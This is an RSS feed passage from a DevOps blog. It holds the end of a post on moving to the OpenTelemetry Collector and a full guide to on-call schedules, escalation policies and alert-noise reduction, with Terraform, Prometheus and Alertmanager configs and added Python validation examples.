<pre><code class="hljs language-yaml"><span class="hljs-attr">receivers:</span>
  <span class="hljs-attr">otlp:</span>
    <span class="hljs-attr">protocols:</span>
      <span class="hljs-attr">grpc:</span> { <span class="hljs-attr">endpoint:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">:4317</span> }
      <span class="hljs-attr">http:</span> { <span class="hljs-attr">endpoint:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">:4318</span> }
<span class="hljs-attr">processors:</span>
  <span class="hljs-attr">batch:</span> {}
<span class="hljs-attr">exporters:</span>
  <span class="hljs-attr">debug:</span> {}
<span class="hljs-attr">service:</span>
  <span class="hljs-attr">pipelines:</span>
    <span class="hljs-attr">traces:</span>
      <span class="hljs-attr">receivers:</span> [<span class="hljs-string">otlp</span>]
      <span class="hljs-attr">processors:</span> [<span class="hljs-string">batch</span>]
      <span class="hljs-attr">exporters:</span> [<span class="hljs-string">debug</span>]
</code></pre><p>Point one canary service at the collector via <code>OTEL_EXPORTER_OTLP_ENDPOINT</code>. Validate the data shape in the debug log. No production impact, no SLO risk.</p>
<p><strong>Days 15-30: fan-out to your real backend.</strong> Add your vendor&#39;s OTel exporter. Run it as a parallel write path to your existing agent. Diff the dashboards. If traces show up in Datadog through both paths and the counts match within 1%, you have proof.</p>
<p><strong>Days 30-60: kill the agent, one signal at a time.</strong> Start with traces (lowest dashboard surface area for most teams). Disable the vendor agent&#39;s tracing collection, leave its metrics and logs paths intact. Watch the trace dashboard for a week. If it stays steady, move metrics next, then logs.</p>
<p><strong>Days 60-90: standardize the collector config across the fleet.</strong> Pull the per-service collector YAMLs into a shared Helm chart or Terraform module. Bake in the processors you actually need (PII redaction, tail sampling, k8s metadata enrichment). Add a regression test that fails CI if the collector config drifts.</p>
<p>By day 90 the canary service is fully on OTel, you&#39;ve retired the vendor agent on one service tier, and you have a reusable rollout recipe for the rest of the fleet.</p>
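<p>One way to implement the CI regression check from the days 60-90 step, as an added example (not code from this post or from the OpenTelemetry project). It takes the Collector config as already parsed from YAML and reports missing required processors, undefined components, receivers listening on every interface, and any change from a reviewed fingerprint. The required-processor policy, the function names and the hardened sample config are assumptions made for this example.</p>

```python
"""CI policy check for an OpenTelemetry Collector config (added example)."""
import hashlib
import json

# Hypothetical fleet policy: processor types every pipeline must run.
REQUIRED_PROCESSORS = ("redaction", "batch")
# Host parts that mean "listen on every interface" (":4317" has an empty host).
WILDCARD_HOSTS = ("0.0.0.0", "[::]", "")


def component_type(component_id):
    """'redaction/pii' -> 'redaction'; Collector IDs are 'type' or 'type/name'."""
    return component_id.split("/", 1)[0]


def fingerprint(config):
    """Stable SHA-256 over the parsed config; key order does not matter."""
    canonical = json.dumps(config, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def wildcard_listeners(config):
    """Return 'receiver.protocol' entries bound to every interface."""
    found = []
    for rid, rcfg in (config.get("receivers") or {}).items():
        for proto, pcfg in ((rcfg or {}).get("protocols") or {}).items():
            endpoint = (pcfg or {}).get("endpoint", "")
            if endpoint and endpoint.rsplit(":", 1)[0] in WILDCARD_HOSTS:
                found.append(f"{rid}.{proto}")
    return sorted(found)


def check_pipelines(config):
    """Return pipeline policy violations as strings (empty list = pass)."""
    problems = []
    pipelines = (config.get("service") or {}).get("pipelines") or {}
    for name, pipe in sorted(pipelines.items()):
        # Every component a pipeline references must be defined at top level.
        for section in ("receivers", "processors", "exporters"):
            defined = config.get(section) or {}
            for cid in pipe.get(section) or []:
                if cid not in defined:
                    problems.append(f"{name}: {section[:-1]} '{cid}' is not defined")
        used = [component_type(p) for p in pipe.get("processors") or []]
        for required in REQUIRED_PROCESSORS:
            if required not in used:
                problems.append(f"{name}: missing required processor '{required}'")
    return problems


def audit(config, baseline_fingerprint, allow_wildcard=()):
    """Run all checks; CI fails the build when the returned list is non-empty."""
    problems = check_pipelines(config)
    for listener in wildcard_listeners(config):
        if listener not in allow_wildcard:
            problems.append(f"{listener}: listens on all interfaces")
    if fingerprint(config) != baseline_fingerprint:
        problems.append("config differs from the reviewed baseline")
    return problems


# The post's shadow-mode config, as a YAML parser would return it.
SHADOW_CONFIG = {
    "receivers": {"otlp": {"protocols": {
        "grpc": {"endpoint": "0.0.0.0:4317"},
        "http": {"endpoint": "0.0.0.0:4318"},
    }}},
    "processors": {"batch": {}},
    "exporters": {"debug": {}},
    "service": {"pipelines": {"traces": {
        "receivers": ["otlp"], "processors": ["batch"], "exporters": ["debug"],
    }}},
}

# Constructed sidecar variant: loopback listeners plus a redaction processor.
HARDENED_CONFIG = {
    "receivers": {"otlp": {"protocols": {
        "grpc": {"endpoint": "localhost:4317"},
        "http": {"endpoint": "localhost:4318"},
    }}},
    "processors": {
        # Constructed pattern; replace with the values your data actually needs.
        "redaction/pii": {"allow_all_keys": True,
                          "blocked_values": ["[0-9]{3}-[0-9]{2}-[0-9]{4}"]},
        "batch": {},
    },
    "exporters": {"debug": {}},
    "service": {"pipelines": {"traces": {
        "receivers": ["otlp"],
        "processors": ["redaction/pii", "batch"],
        "exporters": ["debug"],
    }}},
}

if __name__ == "__main__":
    for label, cfg in (("shadow", SHADOW_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit(cfg, fingerprint(cfg))
        print(label, "PASS" if not findings else findings)
```

<p>In CI, parse the chart's rendered Collector YAML, commit the fingerprint of the reviewed config next to it, and pass any listener that must accept traffic from other pods (a DaemonSet, for example) through <code>allow_wildcard</code>.</p>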
<h2 id="h2-what-this-doesnt-fix" class="group relative scroll-mt-24">
        <a href="#h2-what-this-doesnt-fix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What this doesn't fix
        </a>
        </h2><p>OpenTelemetry graduating doesn&#39;t mean observability is solved. Three things it still doesn&#39;t address:</p>
<ul>
<li><strong>Backend pricing.</strong> Switching your shipping layer to OTel doesn&#39;t change what Datadog charges per host. You get optionality (you can swap backends later), not immediate cost savings.</li>
<li><strong>Cardinality explosion.</strong> OTel makes it easier than ever to instrument everything. If you add a <code>user_id</code> attribute to every span without sampling, your bill will go through the roof faster than before, just in OTLP format.</li>
<li><strong>Correlation across signals.</strong> OTel defines the formats. The actual cross-signal correlation (trace_id on a log, span_id on a metric exemplar) still depends on instrumentation discipline at each service. Graduation doesn&#39;t automatically wire your existing log lines into your traces.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>OpenTelemetry graduating from CNCF on May 21 is the formal signal that the standard-or-not debate is over. All three core signals are production-stable, the project&#39;s velocity is second only to Kubernetes, and every major observability backend now accepts OTLP. The realistic action for most teams: deploy the OTel Collector in shadow mode this quarter, validate against your existing pipeline, and retire one proprietary agent per signal over 90 days.</p>
<p>If you only do one thing this week, run <code>ps aux | grep -iE &#39;datadog|newrelic|splunkd|fluentd&#39;</code> on a production host and count what&#39;s still there. That&#39;s your retire list. The collector that replaces all of them is one Helm install away.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.cncf.io/announcements/2026/05/21/cloud-native-computing-foundation-announces-opentelemetrys-graduation-solidifying-status-as-the-de-facto-observability-standard/">CNCF announcement: OpenTelemetry graduates</a></li>
<li><a href="https://opentelemetry.io/docs/collector/">OpenTelemetry Collector docs</a></li>
<li><a href="https://docs.datadoghq.com/opentelemetry/">Datadog OTel ingestion docs</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How to Build an Effective On-Call Rotation and Escalation Policy]]></title>
      <link>https://devops-daily.com/posts/on-call-rotation-escalation-policy-guide</link>
      <description><![CDATA[Your phone buzzed at 3:14 AM for a disk warning that auto-resolved by 3:16. Nobody fixes the alert. The next person on rotation hates their life. Here is how to build on-call schedules, escalation policies, and alert rules that respect your engineers.]]></description>
      <pubDate>Mon, 25 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/on-call-rotation-escalation-policy-guide</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[incident-management]]></category><category><![CDATA[on-call]]></category><category><![CDATA[escalation]]></category><category><![CDATA[alert-fatigue]]></category><category><![CDATA[sre]]></category><category><![CDATA[devops]]></category><category><![CDATA[observability]]></category>
      <content:encoded><![CDATA[<p>Your phone buzzes at 3:14 AM. It is a <code>DiskUsageHigh</code> warning on a staging node. By the time you grab your laptop, it has auto-resolved. You go back to sleep, except now you are wide awake at 4 AM staring at the ceiling, knowing the next page might be a real incident. On Monday, you mention it in standup. Someone says &quot;yeah, that one fires all the time.&quot; Nobody opens a ticket. Next week the next person on rotation gets the same page.</p>
<p>This is how on-call rotations rot. Not from one bad incident, but from a slow leak of trust between engineers and the alerts they answer to. Building an on-call rotation that does not burn people out is a design problem, not a tooling problem. The tooling matters, but only after you decide what should wake a human up and what should not.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><p>A good on-call rotation has three pieces: a schedule that is fair and predictable, an escalation policy that catches dropped pages without spamming everyone, and an alert pipeline that only pages humans for things humans can act on right now. Get all three right and on-call becomes tolerable. Get any one wrong and people will quit.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>An alerting backend like Alertmanager, PagerDuty, Opsgenie, or Grafana OnCall</li>
<li>Prometheus or another metrics source that fires alerts</li>
<li>A team of at least four engineers (anything smaller and you are running a hero rotation, which is a separate problem)</li>
<li>Buy-in from your manager that on-call work is real work, not a side task</li>
</ul>
<h2 id="h2-step-1-design-the-schedule-before-you-pick-the-tool" class="group relative scroll-mt-24">
        <a href="#h2-step-1-design-the-schedule-before-you-pick-the-tool" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: Design the Schedule Before You Pick the Tool
        </a>
        </h2><p>Most teams jump straight into PagerDuty and start clicking. Stop. Decide the shape of the rotation first.</p>
<p>The three common shapes:</p>
<ul>
<li><strong>Weekly rotation</strong>: one engineer carries the pager for 7 days. Simple, but brutal if your service is noisy. Good for low-volume rotations.</li>
<li><strong>Follow-the-sun</strong>: hand off every 8 to 12 hours across timezones. Best if you have engineers in at least two regions. Nobody gets paged at 3 AM.</li>
<li><strong>Split primary/secondary</strong>: a primary handles the page, a secondary backs them up if the primary misses it. Adds redundancy without doubling the load.</li>
</ul>
<p>For most teams between 5 and 15 engineers in one timezone, the right answer is a weekly rotation with a secondary on a separate, offset schedule. Here is what that looks like as Terraform with the PagerDuty provider:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_schedule&quot;</span> <span class="hljs-string">&quot;primary_oncall&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Primary On-Call&quot;</span>
  time_zone = <span class="hljs-string">&quot;Europe/London&quot;</span>

  layer {
    name                         = <span class="hljs-string">&quot;Weekly Rotation&quot;</span>
    start                        = <span class="hljs-string">&quot;2026-06-01T09:00:00Z&quot;</span>
    rotation_virtual_start       = <span class="hljs-string">&quot;2026-06-01T09:00:00Z&quot;</span>
    rotation_turn_length_seconds = <span class="hljs-number">604800</span>  <span class="hljs-comment"># 7 days</span>
    users = [
      pagerduty_user.alice.id,
      pagerduty_user.bob.id,
      pagerduty_user.carol.id,
      pagerduty_user.dave.id,
      pagerduty_user.eve.id,
    ]
  }
}

<span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_schedule&quot;</span> <span class="hljs-string">&quot;secondary_oncall&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Secondary On-Call&quot;</span>
  time_zone = <span class="hljs-string">&quot;Europe/London&quot;</span>

  layer {
    name                         = <span class="hljs-string">&quot;Offset Weekly Rotation&quot;</span>
    start                        = <span class="hljs-string">&quot;2026-06-04T09:00:00Z&quot;</span>  <span class="hljs-comment"># offset 3 days</span>
    rotation_virtual_start       = <span class="hljs-string">&quot;2026-06-04T09:00:00Z&quot;</span>
    rotation_turn_length_seconds = <span class="hljs-number">604800</span>
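    <span class="hljs-comment"># Same people, order shifted by two so nobody is primary and secondary at once</span>
    users = [
      pagerduty_user.carol.id,
      pagerduty_user.dave.id,
      pagerduty_user.eve.id,
      pagerduty_user.alice.id,
      pagerduty_user.bob.id,
    ]
  }
}
</code></pre><p>The 3-day offset, combined with a user order shifted by two positions in the secondary layer, means the same person is never primary and secondary at the same time. With an identical order in both layers, each engineer's secondary week would begin three days into their own primary week. It also means everyone gets a clear &quot;I am on&quot; week and a separate &quot;I am the backup&quot; week.</p>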
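<p>Whether an offset secondary schedule ever leaves one engineer holding both tiers depends on the user order as well as the offset. The following is an added example, not part of the original article or the PagerDuty provider: it models a layer as fixed-length turns taken in list order from <code>rotation_virtual_start</code>, and compares a secondary that reuses the primary's order with shifted orders. The names <code>Layer</code>, <code>double_duty_windows</code>, <code>shifted</code> and <code>safe_shifts</code> are hypothetical.</p>

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

WEEK = timedelta(seconds=604800)  # rotation_turn_length_seconds in both layers


@dataclass(frozen=True)
class Layer:
    """One schedule layer: users take fixed-length turns in list order."""
    users: tuple
    virtual_start: datetime  # the first user's turn begins here
    turn: timedelta = WEEK

    def on_call(self, at):
        """User holding this layer at `at`, or None before the layer starts."""
        if at < self.virtual_start:
            return None
        turns_elapsed = (at - self.virtual_start) // self.turn
        return self.users[turns_elapsed % len(self.users)]


def double_duty_windows(primary, secondary, until, step=timedelta(hours=1)):
    """Return (start, end, user) windows in which one user holds both layers."""
    windows, open_start, open_user = [], None, None
    t = min(primary.virtual_start, secondary.virtual_start)
    while t < until:
        p, s = primary.on_call(t), secondary.on_call(t)
        user = p if (p is not None and p == s) else None
        if user != open_user:
            if open_user is not None:
                windows.append((open_start, t, open_user))
            open_start, open_user = t, user
        t += step
    if open_user is not None:  # close a window still open at the horizon
        windows.append((open_start, until, open_user))
    return windows


def shifted(users, n):
    """Rotate the user order left by n positions."""
    return users[n:] + users[:n]


def safe_shifts(users, primary_start, offset, cycles=2):
    """Order shifts for the secondary layer that never produce double duty."""
    primary = Layer(users, primary_start)
    until = primary_start + primary.turn * len(users) * cycles
    safe = []
    for n in range(len(users)):
        secondary = Layer(shifted(users, n), primary_start + offset)
        if not double_duty_windows(primary, secondary, until):
            safe.append(n)
    return safe


# Values taken from the article's two schedule resources.
USERS = ("alice", "bob", "carol", "dave", "eve")
PRIMARY_START = datetime(2026, 6, 1, 9, tzinfo=timezone.utc)
OFFSET = timedelta(days=3)

if __name__ == "__main__":
    primary = Layer(USERS, PRIMARY_START)
    horizon = PRIMARY_START + WEEK * 10  # two full cycles of five people
    same_order = Layer(USERS, PRIMARY_START + OFFSET)
    for start, end, user in double_duty_windows(primary, same_order, horizon)[:3]:
        print(f"same order: {user} holds both tiers {start:%b %d} to {end:%b %d}")
    print("safe shifts for the secondary order:",
          safe_shifts(USERS, PRIMARY_START, OFFSET))
```

<p>Run it again whenever the team size, turn length or offset changes, because the set of safe shifts depends on all three.</p>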
<p>A few rules that prevent rotations from collapsing:</p>
<ul>
<li><strong>Publish the schedule at least 8 weeks ahead.</strong> People plan weddings, holidays, school pickups. Surprise shifts kill morale faster than the actual pages do.</li>
<li><strong>Let people swap shifts without asking permission.</strong> Build a Slack channel, not a request queue. The only rule should be &quot;find your own replacement before swapping.&quot;</li>
<li><strong>Pay for it, or give time off in lieu.</strong> Unpaid on-call is theft. If you cannot pay, give the on-call engineer a half-day off after a busy week.</li>
</ul>
<h2 id="h2-step-2-build-an-escalation-policy-that-actually-catches-drops" class="group relative scroll-mt-24">
        <a href="#h2-step-2-build-an-escalation-policy-that-actually-catches-drops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: Build an Escalation Policy That Actually Catches Drops
        </a>
        </h2><p>A page that nobody answers is worse than no page at all, because the incident keeps burning while you have a false sense of &quot;someone is on it.&quot; Your escalation policy is the safety net.</p>
<p>The classic pattern: primary gets paged, has 5 minutes to acknowledge, then secondary, then a manager or incident commander.</p>
<pre><code class="hljs language-text">+---------------------+
|  Alert fires        |
+----------+----------+
           |
           v
+----------+----------+        +---------------------+
| Primary on-call     | -----&gt; | ACK within 5 min?   |
+----------+----------+        +----------+----------+
                                          | No
                                          v
                              +-----------+-----------+
                              | Secondary on-call     |
                              +-----------+-----------+
                                          |
                                          | No ACK in 10 min
                                          v
                              +-----------+-----------+
                              | Incident Commander    |
                              | or Engineering Manager|
                              +-----------------------+
</code></pre><p>Here is the same policy in Terraform:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_escalation_policy&quot;</span> <span class="hljs-string">&quot;platform&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Escalation&quot;</span>
  num_loops = <span class="hljs-number">2</span>

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">5</span>
    target {
      type = <span class="hljs-string">&quot;schedule_reference&quot;</span>
      id   = pagerduty_schedule.primary_oncall.id
    }
  }

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">10</span>
    target {
      type = <span class="hljs-string">&quot;schedule_reference&quot;</span>
      id   = pagerduty_schedule.secondary_oncall.id
    }
  }

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">15</span>
    target {
      type = <span class="hljs-string">&quot;user_reference&quot;</span>
      id   = pagerduty_user.engineering_manager.id
    }
  }
}
</code></pre><p>Three things worth calling out:</p>
<ol>
<li><strong>5 minutes to acknowledge is the sweet spot.</strong> Less than that and you escalate before someone has unlocked their phone. More than that and a real outage burns for too long before help arrives.</li>
<li><strong><code>num_loops = 2</code> means the policy retries.</strong> If the manager also misses it, it goes back to the primary. Without this, a sleeping team can drop a page entirely.</li>
<li><strong>The manager is a fallback, not the default.</strong> If your manager is getting paged regularly, your team is too small or your alerts are too noisy. Probably both.</li>
</ol>
<h2 id="h2-step-3-cut-alert-noise-ruthlessly" class="group relative scroll-mt-24">
        <a href="#h2-step-3-cut-alert-noise-ruthlessly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: Cut Alert Noise Ruthlessly
        </a>
        </h2><p>This is where most on-call rotations live or die. The right number of pages per week per engineer is roughly <strong>0 to 2</strong>, and only one of those should happen outside business hours. If you are above that, you have a noise problem and no escalation policy will save you.</p>
<p>The fix is severity tiers. Not every alert deserves a phone call.</p>
<table>
<thead>
<tr>
<th>Severity</th>
<th>Action</th>
<th>Example</th>
</tr>
</thead>
<tbody><tr>
<td><code>page</code></td>
<td>Wake someone up</td>
<td>API error rate above 5% for 5 minutes</td>
</tr>
<tr>
<td><code>ticket</code></td>
<td>File a ticket</td>
<td>Disk at 80%, certificate expires in 14 days</td>
</tr>
<tr>
<td><code>info</code></td>
<td>Log only, no action</td>
<td>Deploy started, cache warmed</td>
</tr>
</tbody></table>
<p>Encode this in your Prometheus alert rules. Example:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">groups:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">api-availability</span>
  <span class="hljs-attr">interval:</span> <span class="hljs-string">30s</span>
  <span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">APIHighErrorRate</span>
    <span class="hljs-attr">expr:</span> <span class="hljs-string">|
      (
        sum(rate(http_requests_total{job=&quot;api&quot;,status=~&quot;5..&quot;}[5m]))
        /
        sum(rate(http_requests_total{job=&quot;api&quot;}[5m]))
      ) &gt; 0.05
</span>    <span class="hljs-attr">for:</span> <span class="hljs-string">5m</span>
    <span class="hljs-attr">labels:</span>
      <span class="hljs-attr">severity:</span> <span class="hljs-string">page</span>
      <span class="hljs-attr">team:</span> <span class="hljs-string">platform</span>
    <span class="hljs-attr">annotations:</span>
      <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;API 5xx error rate above 5% for 5 minutes&quot;</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&quot;https://runbooks.example.com/api-high-error-rate&quot;</span>
      <span class="hljs-attr">dashboard:</span> <span class="hljs-string">&quot;https://grafana.example.com/d/api-overview&quot;</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">DiskSpaceWarning</span>
    <span class="hljs-attr">expr:</span> <span class="hljs-string">|
      (1 - (node_filesystem_avail_bytes{mountpoint=&quot;/&quot;} / node_filesystem_size_bytes{mountpoint=&quot;/&quot;})) &gt; 0.80
</span>    <span class="hljs-attr">for:</span> <span class="hljs-string">30m</span>
    <span class="hljs-attr">labels:</span>
      <span class="hljs-attr">severity:</span> <span class="hljs-string">ticket</span>
      <span class="hljs-attr">team:</span> <span class="hljs-string">platform</span>
    <span class="hljs-attr">annotations:</span>
      <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;Disk usage above 80% on <span class="hljs-template-variable">{{ $labels.instance }}</span>&quot;</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&quot;https://runbooks.example.com/disk-space&quot;</span>
</code></pre><p>Then route on severity in Alertmanager. <code>page</code> goes to PagerDuty, <code>ticket</code> opens a Jira issue, <code>info</code> posts to a Slack channel nobody is required to read:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">route:</span>
  <span class="hljs-attr">receiver:</span> <span class="hljs-string">slack-info</span>
  <span class="hljs-attr">group_by:</span> [<span class="hljs-string">&#x27;alertname&#x27;</span>, <span class="hljs-string">&#x27;cluster&#x27;</span>]
  <span class="hljs-attr">routes:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;page&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">pagerduty-platform</span>
    <span class="hljs-attr">group_wait:</span> <span class="hljs-string">30s</span>
    <span class="hljs-attr">group_interval:</span> <span class="hljs-string">5m</span>
    <span class="hljs-attr">repeat_interval:</span> <span class="hljs-string">4h</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;ticket&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">jira-platform</span>
    <span class="hljs-attr">group_wait:</span> <span class="hljs-string">5m</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;info&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">slack-info</span>

<span class="hljs-attr">receivers:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pagerduty-platform</span>
  <span class="hljs-attr">pagerduty_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">service_key:</span> <span class="hljs-string">&lt;REDACTED&gt;</span>
    <span class="hljs-attr">description:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.summary }}&#x27;</span>
    <span class="hljs-attr">details:</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.runbook }}&#x27;</span>
      <span class="hljs-attr">dashboard:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.dashboard }}&#x27;</span>

<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">jira-platform</span>
  <span class="hljs-attr">webhook_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">url:</span> <span class="hljs-string">&#x27;https://jira-bot.example.com/create&#x27;</span>

<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">slack-info</span>
  <span class="hljs-attr">slack_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">api_url:</span> <span class="hljs-string">&#x27;https://hooks.slack.com/services/...&#x27;</span>
    <span class="hljs-attr">channel:</span> <span class="hljs-string">&#x27;#alerts-info&#x27;</span>
</code></pre><p>Two non-negotiable rules for any rule labelled <code>severity: page</code>:</p>
<ol>
<li><strong>It must link to a runbook.</strong> Not a wiki home page. A document with the actual commands to run. If you cannot write a runbook, the alert is not actionable enough to page on.</li>
<li><strong>It must include a <code>for:</code> clause of at least 2 minutes.</strong> This prevents flapping. The disk that fills to 81% for 30 seconds because of a log rotation should not wake you.</li>
</ol>
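<p>Both rules can be enforced in CI before a rule file is merged. The following is an added example, not code from the article or from Prometheus: it lints rule groups already parsed into Python data (the shape a YAML loader returns for the file above). The function names, the finding labels and the two failing sample rules are constructed, and treating a runbook URL with an empty path as a home page is an assumption of this sketch.</p>

```python
import re
from urllib.parse import urlparse

MIN_FOR_SECONDS = 120  # the article's "at least 2 minutes"
_UNITS = {"ms": 0.001, "s": 1, "m": 60, "h": 3600,
          "d": 86400, "w": 604800, "y": 31536000}
_PART = re.compile(r"(\d+)(ms|[smhdwy])")


def duration_seconds(text):
    """Parse a Prometheus duration such as '5m' or '1h30m' into seconds."""
    pos, total = 0, 0.0
    for match in _PART.finditer(text):
        if match.start() != pos:  # junk between or before the parts
            raise ValueError(f"bad duration: {text!r}")
        total += int(match.group(1)) * _UNITS[match.group(2)]
        pos = match.end()
    if pos == 0 or pos != len(text):
        raise ValueError(f"bad duration: {text!r}")
    return total


def lint_page_rules(rule_file):
    """Return (alert, finding) pairs for severity=page rules that break a rule."""
    findings = []
    for group in rule_file.get("groups", []):
        for rule in group.get("rules", []):
            if "alert" not in rule:  # recording rules never page
                continue
            if rule.get("labels", {}).get("severity") != "page":
                continue
            name = rule["alert"]

            # Rule 1: a runbook link that points at a document.
            url = urlparse(rule.get("annotations", {}).get("runbook", ""))
            if url.scheme not in ("http", "https") or not url.netloc:
                findings.append((name, "runbook-missing"))
            elif url.path in ("", "/"):
                findings.append((name, "runbook-is-home-page"))

            # Rule 2: a `for:` clause of at least two minutes.
            # An absent `for:` means the alert fires immediately.
            try:
                hold = duration_seconds(str(rule.get("for", "0s")))
            except ValueError:
                findings.append((name, "for-unparseable"))
            else:
                if hold < MIN_FOR_SECONDS:
                    findings.append((name, "for-below-2m"))
    return findings


# First two rules mirror the article's file (expressions omitted);
# the last two are constructed to fail.
SAMPLE_RULES = {"groups": [{"name": "api-availability", "rules": [
    {"alert": "APIHighErrorRate", "for": "5m",
     "labels": {"severity": "page", "team": "platform"},
     "annotations": {
         "runbook": "https://runbooks.example.com/api-high-error-rate"}},
    {"alert": "DiskSpaceWarning", "for": "30m",
     "labels": {"severity": "ticket", "team": "platform"},
     "annotations": {"runbook": "https://runbooks.example.com/disk-space"}},
    {"alert": "QueueBacklog", "for": "30s",
     "labels": {"severity": "page"},
     "annotations": {"runbook": "https://wiki.example.com/"}},
    {"alert": "CacheDown", "labels": {"severity": "page"}},
]}]}

if __name__ == "__main__":
    for alert, finding in lint_page_rules(SAMPLE_RULES):
        print(f"{alert}: {finding}")
```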
<h2 id="h2-step-4-review-pages-every-week" class="group relative scroll-mt-24">
        <a href="#h2-step-4-review-pages-every-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: Review Pages Every Week
        </a>
        </h2><p>The cheapest reliability work you can do is a weekly on-call review. 30 minutes, every Monday, with the off-going engineer talking through every page they got.</p>
<p>A simple template:</p>
<pre><code class="hljs language-text">On-Call Handover: 2026-05-18 to 2026-05-25
Engineer: Alice

Pages received: 4
  - Mon 02:14  APIHighErrorRate         REAL    fixed by rolling deploy
  - Tue 09:02  DiskSpaceWarning         NOISE   threshold too low, raised to 90%
  - Wed 04:33  PodCrashLoopBackOff      REAL    OOMKilled, increased memory limit
  - Sat 23:48  CertExpiryWarning        NOISE   renewal cron already running, ack window too short

Action items:
  1. Raise DiskSpaceWarning to 90% and move to severity=ticket (Alice, this week)
  2. Increase ack window on CertExpiryWarning from 5m to 30m (Bob, this week)
  3. Document OOM debug runbook (Carol, by next handover)
</code></pre><p>If an alert shows up as <code>NOISE</code> two weeks in a row, it gets fixed or it gets deleted. No exceptions. This is the single most important habit. Without it, your alert rules accumulate noise the same way a closet accumulates clothes you never wear.</p>
<h2 id="h2-what-you-should-do-this-week" class="group relative scroll-mt-24">
        <a href="#h2-what-you-should-do-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What You Should Do This Week
        </a>
        </h2><p>You probably will not redesign your entire on-call setup tomorrow. Pick one of these and do it before Friday:</p>
<ol>
<li><strong>Pull last month's pages from PagerDuty.</strong> Count how many were real vs noise. If the noise ratio is over 30%, your team is being trained to ignore the pager.</li>
<li><strong>Add a <code>runbook</code> annotation to your top 5 noisiest alerts.</strong> Even a one-paragraph &quot;if you see this, check X and Y&quot; is enough to start.</li>
<li><strong>Add a secondary on-call schedule</strong> if you do not have one. Even if it is the same five people, the escalation safety net is worth it.</li>
<li><strong>Schedule a 30-minute weekly handover meeting.</strong> Block it on the calendar as recurring. Make it dead simple to attend, even from a phone in a coffee shop.</li>
</ol>
<p>On-call will never be fun. But it should not be the reason your best engineers polish their CVs. Treat it like a system that needs maintenance, not a tax you collect from junior engineers, and your retention numbers will thank you.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 22, 2026]]></title>
